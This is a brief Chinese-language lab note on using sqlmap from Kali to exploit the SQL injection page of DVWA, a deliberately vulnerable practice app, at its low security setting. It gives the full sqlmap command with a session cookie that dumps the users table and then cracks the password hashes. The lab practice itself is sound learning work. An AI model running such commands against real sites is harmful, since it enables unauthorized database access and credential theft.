本文最后更新于 1430 天前,其中的信息可能已经有所发展或是发生改变。
学习自教程:https://blog.csdn.net/weixin_41843699/article/details/99976743
使用kali访问metasploitable搭建的DVWA
将Security设为low,再到SQL Injection处随机输入一串数字,点击submit后将url保存,按F12查看cookie,将cookie以这种形式保存security=low;PHPSESSID=68a54f9e32f28c4e508575e7b98bae6a
打开sqlmap,输入命令sqlmap -u "http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=123&Submit=Submit#" --cookie="security=low;PHPSESSID=68a54f9e32f28c4e508575e7b98bae6a" -D dvwa -T users -C user,password –dump
图为跑字典破解密码hash值
可以看到已经运行完毕,成功返回用户名和密码值